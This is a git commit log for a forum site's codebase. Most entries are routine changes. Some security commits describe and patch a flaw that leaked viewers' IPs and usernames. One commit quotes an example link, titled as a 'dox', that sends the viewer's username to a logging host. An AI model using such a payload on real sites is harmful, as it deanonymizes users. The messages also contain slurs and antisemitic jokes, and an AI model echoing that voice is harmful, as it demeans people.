Snakes
fe5ffd1bcf
security: sanitize !YOU! in <a href="">.
Unlike the recent auto-embed exploits which have been patched, this
requires active user action. However our userbase, like all userbases,
contains quite a few retards and phoneposters who don't check links
before clicking.
Example exploit:
<a href="https://example.com/log?username=!YOU !">Bardfinn Dox</a>
2022-12-05 19:05:02 -05:00
Snakes
616634158c
Narrow approved_embed_hosts for security.
Probably will break some people's profilecss and irritate the
newsposters, but in light of recent live proven exploits to disclose
user IP & username pairs to remote servers, the broad list of embed
hosts was unsustainable and impossible to prove safe.
We extend is_safe_url to allow whitelisting subdomains, specifically
to solve the s.lain.la open redirect exploit. Also, open media proxies
like external-content.duckduckgo.com were concerning enough, despite
likely being safe, to warrant removal. Anything infrequently used and
difficult to review, or that has a reasonable alternative, was also removed.
In general: we want people to be rehosting, and if we want to allow
more external content, we need to run a media proxy. The central issue
is that any user-configurable 302 is a potential disclosure risk, and
Lord knows how many ways there were to get <arbitrarynewssite>.com to
do so. Maybe zero, but the problem is we just don't know.
2022-12-05 18:57:35 -05:00
float-trip
bca9aff068
Disallow !YOU! in URLs. (#49)
!YOU! + an escape for `approved_embed_hosts` could let you grab the IP and username of everyone who views your comment
https://rdrama.net/post/129053/you-callout-thread/3191218?context=8#context
lain.la has a URL shortener that also works to get around embed hosts, fwiw
Co-authored-by: float trip <float-trip@rdrama.net>
Reviewed-on: #49
Co-authored-by: float-trip <float-trip@noreply.fsdfsd.net>
Co-committed-by: float-trip <float-trip@noreply.fsdfsd.net>
2022-12-05 21:20:59 +00:00
Aevann1
159cb52e46
add looksmax.org to BOOSTED_SITES
2022-12-05 15:59:01 +02:00
Aevann1
9dacb7c307
add teamblind.com to boosted sites
2022-12-05 08:13:11 +02:00
Aevann
18df70caab
allow JL3 to edit rules (#39)
Co-authored-by: Aevann1 <randomname42029@gmail.com>
Reviewed-on: #39
Co-authored-by: Aevann <aevann@noreply.fsdfsd.net>
Co-committed-by: Aevann <aevann@noreply.fsdfsd.net>
2022-12-05 05:22:08 +00:00
Aevann1
5473cb3084
add snus mentions
2022-12-05 04:01:55 +02:00
Aevann1
f2c4dc429a
fix for MIMW_ID
2022-12-05 04:01:01 +02:00
Aevann1
66aeb82823
add pings for MIMW
2022-12-05 03:57:24 +02:00
Aevann1
468fd5f5f4
add (((heymoon))) notifs
2022-12-05 03:40:51 +02:00
Snakes
be2b210df4
Remove superfluous #disablepoll command.
Already resolved by 29070c78a9.
2022-12-04 17:15:52 -05:00
justcool393
ed0981cbdb
add functionality to disable poll formatting (#35)
Co-authored-by: justcool393 <justcool393@gmail.com>
Reviewed-on: #35
Co-authored-by: justcool393 <justcool393@noreply.fsdfsd.net>
Co-committed-by: justcool393 <justcool393@noreply.fsdfsd.net>
2022-12-04 21:46:27 +00:00
Aevann1
892e35b1c3
splash mountain for PCM
2022-12-04 23:28:39 +02:00
Aevann1
e66234eb6a
fix offsitementions
2022-12-04 21:48:28 +02:00
Aevann1
da643ea88b
sneed
2022-12-04 21:30:33 +02:00
Aevann
e105035272
remove country club system and replace it with a 3 tier thing: (#41)
- /h/masterbaiters: 1 TS - for gayops
- /h/countryclub: 1000 TS - for anything requiring secrecy and doesn't need critical mass - have to make it a rule that u can't post gayops in /h/countryclub
- /h/chudrama: 5000 TS - for chad+stud posts
EDIT: i removed the /h/masterbaiters gate, but u can bring it back if u want
Co-authored-by: Aevann1 <randomname42029@gmail.com>
Co-authored-by: Snakes <duolsm@outlook.com>
Reviewed-on: #41
Co-authored-by: Aevann <aevann@noreply.fsdfsd.net>
Co-committed-by: Aevann <aevann@noreply.fsdfsd.net>
2022-12-04 18:39:06 +00:00
Aevann1
29070c78a9
fix this and related stuff https://stupidpol.site/h/programming/post/128394/advent-of-code-day-3-i/3182179?context=8#context
2022-12-04 17:53:41 +02:00
Aevann1
30405e1841
slur fix
2022-12-04 16:44:59 +02:00
Aevann1
1f675c61e5
minor regex fix for emojis
2022-12-04 00:26:05 +02:00
Aevann1
a92737b85c
re-add kylie slur filter
2022-12-04 00:01:24 +02:00
Aevann1
8d218c28e2
fix this https://stupidpol.site/h/programming/post/128511/nostalgia-post-heres-a-shitty-tictactoe/3179456?context=8#context
2022-12-03 22:09:12 +02:00
Aevann1
0046e63bc7
boost /h/programming temporarily - revert at will
2022-12-03 21:56:27 +02:00
Aevann1
a13311d72e
sneed
2022-12-03 21:10:59 +02:00
Aevann1
a193952c5e
fix this https://stupidpol.site/h/slackernews/post/128394/advent-of-code-day-3-i/3177263?context=8#context
2022-12-03 10:02:26 +02:00
Aevann1
3907a2f25f
make the gevent sequential
2022-12-03 01:25:48 +02:00
Snakes
9b09181e28
Dispatch push notifications using greenlets.
2022-12-02 18:15:58 -05:00
Snakes
d79465517d
Rename siege log filename.
2022-12-02 17:50:48 -05:00
Aevann1
9947e635ab
make supportjews.webp an image instead
2022-12-03 00:32:51 +02:00
Aevann1
6248042e46
add supportjews emoji and use it in chud message
2022-12-03 00:22:18 +02:00
Aevann
5c2dab73c7
stop using pusher (#37)
Co-authored-by: Aevann1 <randomname42029@gmail.com>
Co-authored-by: Snakes <duolsm@outlook.com>
Reviewed-on: #37
Co-authored-by: Aevann <aevann@noreply.fsdfsd.net>
Co-committed-by: Aevann <aevann@noreply.fsdfsd.net>
2022-12-02 22:21:18 +00:00
Aevann1
3542703ced
Revert "make it so only the post author can declare winner and not all admins"
This reverts commit 9e1425d93e.
2022-12-03 00:08:46 +02:00
Aevann1
9e1425d93e
make it so only the post author can declare winner and not all admins
2022-12-03 00:06:57 +02:00
Aevann1
25be392e3b
add soyjak.party to BOOSTED SITES
2022-12-03 00:02:04 +02:00
Aevann1
064b5878f9
add "media" tld
2022-12-02 12:38:07 +02:00
Aevann1
acd4a61232
add dramarama to boosted users
2022-12-01 18:22:00 +02:00
Aevann1
238c92b703
make PAGE_SIZES ordered
2022-12-01 14:28:00 +02:00
Aevann1
845e13b4ae
minor bug fix
2022-12-01 14:27:15 +02:00
Snakes
1bc086ad1b
PCM: adjust perms, add christmas banner.
2022-11-30 23:38:25 -05:00
Snakes
4585323275
Fix monthly jannie patron badge granting.
2022-11-30 23:38:25 -05:00
Snakes
885601e0ab
Fix offsitementions on localhost testing.
2022-11-30 19:24:45 -05:00
Aevann1
e1ed46fa36
rework reddit notifs - testing on pcm lol
2022-12-01 00:29:13 +02:00
Snakes
d03f3092fa
Adjust badge black/whitelists more.
2022-11-30 16:55:48 -05:00
Aevann1
87ae34966b
badge perm shit
2022-11-30 23:15:10 +02:00
Snakes
312abcbed7
offsitementions: use proper cache key in setter.
2022-11-30 15:44:01 -05:00
justcool393
34f10321fa
antispam: adjust siege threshold
2022-11-30 13:25:32 -06:00
justcool393
d55455d51c
settings: make filename an env var
2022-11-30 13:13:52 -06:00
justcool393
46f2b805ef
config: fix _SETTINGS dict and stray signups
2022-11-30 13:03:46 -06:00
justcool393
497c9bcff1
logging: don't use \n in f-string
2022-11-30 12:49:22 -06:00
justcool393
d783bc8901
logging: make logging an env var
2022-11-30 12:38:55 -06:00
justcool393
d395bcab69
logging: create somewhat sane logging
2022-11-30 12:09:31 -06:00
justcool393
0106a4e340
antispam: under siege mode
2022-11-30 11:37:35 -06:00
Aevann1
9798d2714d
add blizzard forums and bungie forums to BOOSTED_SITES
2022-11-30 13:51:01 +02:00
Aevann1
abe07e7754
this is retarded
2022-11-30 13:35:57 +02:00
justcool393
11059d1665
move calc users to context processor (#31)
jinja more like i can't think of anything witty
Co-authored-by: justcool393 <justcool393@gmail.com>
Reviewed-on: #31
Co-authored-by: justcool393 <justcool393@noreply.fsdfsd.net>
Co-committed-by: justcool393 <justcool393@noreply.fsdfsd.net>
2022-11-29 23:50:32 +00:00
Aevann1
955ec104f2
use the new /icon.webp link everywhere
2022-11-30 01:25:11 +02:00
Aevann1
b6efc27551
use "i" instead of "assets/images"
2022-11-30 00:52:19 +02:00
geese_suck
d79ad8c1f0
event asset caching
2022-11-29 14:01:25 -08:00
justcool393
5056f09380
chat: fix 500 on some... weird... state... i think?
cache: get out of jinja templates
chat: threshold is now a const
2022-11-29 15:49:23 -06:00
justcool393
67bfe5a5bd
remove unnecessary `str()`
2022-11-29 14:29:27 -06:00
geese_suck
a3fa96242c
holiday event manager (actually works now edition) (#22)
Co-authored-by: Snakes <duolsm@outlook.com>
Co-authored-by: justcool393 <justcool393@gmail.com>
Reviewed-on: #22
Co-authored-by: geese_suck <deandre.williams@geese-suck.us>
Co-committed-by: geese_suck <deandre.williams@geese-suck.us>
2022-11-29 20:20:26 +00:00
SneedBot
a7614a5dd2
sneed
2022-11-29 14:11:34 +00:00
Aevann1
53d5f40037
sneed
2022-11-29 04:59:41 +02:00
Aevann1
60d6246a38
add "homo" to slur filter
2022-11-29 03:46:35 +02:00
Snakes
e370a52ecc
PCM: raise upload limit for patrons (by request).
2022-11-28 20:13:22 -05:00
Aevann1
3acc525e0c
truncate odds of lottery winning
2022-11-29 00:21:48 +02:00
SneedBot
c494f006f2
sneed
2022-11-28 06:05:21 +00:00
geese_suck
030710e5db
add fallback award so I don't get fucked by aevann asking me to change something for a site that has 3 active users
2022-11-27 21:24:05 -08:00
Aevann1
94f788ffe9
use exiv2 to remove metadata instead of imagemagick, much much much faster
2022-11-28 05:49:17 +02:00
Aevann1
0fd8157fa6
move CSP to nginx-level
2022-11-28 04:19:59 +02:00
Aevann1
4656fa0b8d
pin posts by pizza/impassionata/TGTW automatically for 1 hour
2022-11-28 04:07:06 +02:00
Aevann
9b50ab7219
minor fix to AGENDAPOSTER_MSG_HTML
2022-11-28 00:44:50 +02:00
Snakes
427f54175c
WPD: constantify badge whitelist, extend set.
2022-11-27 16:49:20 -05:00
justcool393
767cc467bb
marseys: cache marseys and emojis and fun stuff (#15)
Co-authored-by: justcool393 <justcool393@gmail.com>
Reviewed-on: #15
Co-authored-by: justcool393 <justcool393@noreply.fsdfsd.net>
Co-committed-by: justcool393 <justcool393@noreply.fsdfsd.net>
2022-11-27 16:59:36 +00:00
justcool393
77bdb6e87f
themes: add glitter bg category per joan request
2022-11-27 10:15:15 -06:00
Aevann1
575a5080bd
unpaywall profile views
2022-11-27 02:20:54 +02:00
justcool393
3fb647dd13
const: use dict.update instead of... what I did initially
2022-11-26 14:31:20 -06:00
justcool393
ae50cc2772
const: rename constants from LIMIT to MINIMUM
the new name is much much clearer
2022-11-26 14:20:44 -06:00
Marco
af74c7c1fc
Update chud award to include forced trans/pride flag hats (#10)
Disclaimer: I made these changes in Notepad and didn't bother to test this change locally.
Co-authored-by: Marco <bussylmao@gmail.com>
Reviewed-on: #10
Co-authored-by: Marco <marco@noreply.fsdfsd.net>
Co-committed-by: Marco <marco@noreply.fsdfsd.net>
2022-11-26 20:14:31 +00:00
Aevann1
bb153e541d
Revert "you posts: constantify truescore requirement"
This reverts commit 1b721126a2.
2022-11-26 22:09:07 +02:00
justcool393
1b721126a2
you posts: constantify truescore requirement
2022-11-26 13:39:31 -06:00
Aevann1
86b352d301
"my brother in christ" becomes "my brother in Allah"
2022-11-26 07:06:52 +02:00
Aevann1
a641acaf8f
use sets instead of lists in some statements
2022-11-26 06:52:47 +02:00
justcool393
46204ea223
ranking: be site specific when boosting users or excluding users from boosts
otherwise we may unintentionally rank for the wrong users (since we're using literal IDs)
2022-11-25 20:04:09 -06:00
Aevann1
6a94ac3aa9
since lawlz got demopped, make his automatic mod actions be executed by autojanny instead
2022-11-26 03:56:04 +02:00
Aevann1
e96274308a
sneed
2022-11-26 03:31:17 +02:00
Aevann1
0f984b121a
add "negroid" to slur filter
2022-11-26 03:19:22 +02:00
justcool393
35b1532bb4
admin: remove meme admin vestige
2022-11-25 19:15:39 -06:00
Aevann1
0bd96112d1
add joan to BOOSTED_USERS
2022-11-26 01:49:21 +02:00
Aevann1
88ed437c9b
add quad to BOOSTED_USERS
2022-11-26 01:43:23 +02:00
Aevann1
68060ee56e
add dailystormer.in to BOOSTED_SITES
2022-11-26 01:39:37 +02:00
Aevann1
bf4031c832
remove annoying exclamation sign in notifs
2022-11-26 01:18:24 +02:00
justcool393
7e403469cd
polls: constantify max poll options
2022-11-25 16:12:25 -06:00
justcool393
f86d351ac4
fix saved subscribers stuff
2022-11-25 16:06:18 -06:00
Aevann1
c5446b3a39
do this https://rdrama.life/post/125878/colorado-shooter-proves-his-idpol-credentials/3129042?context=8#context
2022-11-25 23:01:35 +02:00
Aevann1
3dee4afa6f
make "snekchad" ping sneks
2022-11-25 21:36:37 +02:00
Aevann1
f672037021
remove lmbo profanity filter
2022-11-25 21:36:09 +02:00
Snakes
0254ff6567
Restrict New User hat to rDrama.
2022-11-23 20:28:39 -05:00
AverageBen10Enjoyer
c37c8be209
Removing references to old repo
2022-11-23 21:19:39 +00:00
justcool393
042edf15bd
make antispam a bit less :marseyshook:
2022-11-23 14:45:09 -06:00
Snakes
654da03435
De-Githubify repo.
- Remove Github-specific tooling.
- Add fsdfsd.net to approved embed hosts.
- Switch link in navigation menu.
2022-11-23 12:24:13 -05:00